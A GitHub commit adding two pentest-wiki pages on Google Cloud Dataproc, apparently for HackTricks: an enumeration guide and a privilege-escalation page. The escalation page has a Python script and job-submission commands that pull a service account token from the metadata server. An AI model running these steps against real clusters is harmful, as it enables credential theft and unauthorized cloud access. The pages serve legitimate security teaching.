Skip to content

Commit e9f3cb5

Browse files
authored
Merge pull request #148 from shamo0/master
grte-shamooo
2 parents 0b5ddcc + 6c4f136 commit e9f3cb5

File tree

2 files changed

+103
-0
lines changed

2 files changed

+103
-0
lines changed
Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
# GCP Dataproc Privilege Escalation
2+
3+
{{#include ../../../banners/hacktricks-training.md}}
4+
5+
## Dataproc
6+
7+
{{#ref}}
8+
../gcp-services/gcp-dataproc-enum.md
9+
{{#endref}}
10+
11+
### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get`
12+
13+
I was unable to get a reverse shell using this method, however it is possible to leak SA token from the metadata endpoint using the method described below.
14+
15+
#### Steps to exploit
16+
17+
- Place the job script on the GCP Bucket
18+
19+
- Submit a job to a Dataproc cluster.
20+
21+
- Use the job to access the metadata server.
22+
23+
- Leak the service account token used by the cluster.
24+
25+
```python
26+
import requests
27+
28+
metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
29+
headers = {"Metadata-Flavor": "Google"}
30+
31+
def fetch_metadata_token():
32+
try:
33+
response = requests.get(metadata_url, headers=headers, timeout=5)
34+
response.raise_for_status()
35+
token = response.json().get("access_token", "")
36+
print(f"Leaked Token: {token}")
37+
return token
38+
except Exception as e:
39+
print(f"Error fetching metadata token: {e}")
40+
return None
41+
42+
if __name__ == "__main__":
43+
fetch_metadata_token()
44+
```
45+
46+
```bash
47+
# Copy the script to the storage bucket
48+
gsutil cp <python-script> gs://<bucket-name>/<python-script>
49+
50+
# Submit the malicious job
51+
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
52+
--cluster=<cluster-name> \
53+
--region=<region>
54+
```
55+
56+
{{#include ../../../banners/hacktricks-training.md}}
Lines changed: 47 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,47 @@
1+
# GCP - Dataproc Enum
2+
3+
{{#include ../../../banners/hacktricks-training.md}}
4+
5+
## Basic Infromation
6+
7+
Google Cloud Dataproc is a fully managed service for running Apache Spark, Apache Hadoop, Apache Flink, and other big data frameworks. It is primarily used for data processing, querying, machine learning, and stream analytics. Dataproc enables organizations to create clusters for distributed computing with ease, integrating seamlessly with other Google Cloud Platform (GCP) services like Cloud Storage, BigQuery, and Cloud Monitoring.
8+
9+
Dataproc clusters run on virtual machines (VMs), and the service account associated with these VMs determines the permissions and access level of the cluster.
10+
11+
## Components
12+
13+
A Dataproc cluster typically includes:
14+
15+
Master Node: Manages cluster resources and coordinates distributed tasks.
16+
17+
Worker Nodes: Execute distributed tasks.
18+
19+
Service Accounts: Handle API calls and access other GCP services.
20+
21+
## Enumeration
22+
23+
Dataproc clusters, jobs, and configurations can be enumerated to gather sensitive information, such as service accounts, permissions, and potential misconfigurations.
24+
25+
### Cluster Enumeration
26+
27+
To enumerate Dataproc clusters and retrieve their details:
28+
29+
```
30+
gcloud dataproc clusters list --region=<region>
31+
gcloud dataproc clusters describe <cluster-name> --region=<region>
32+
```
33+
34+
### Job Enumeration
35+
36+
```
37+
gcloud dataproc jobs list --region=<region>
38+
gcloud dataproc jobs describe <job-id> --region=<region>
39+
```
40+
41+
### Privesc
42+
43+
{{#ref}}
44+
../gcp-privilege-escalation/gcp-dataproc-privesc.md
45+
{{#endref}}
46+
47+
{{#include ../../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)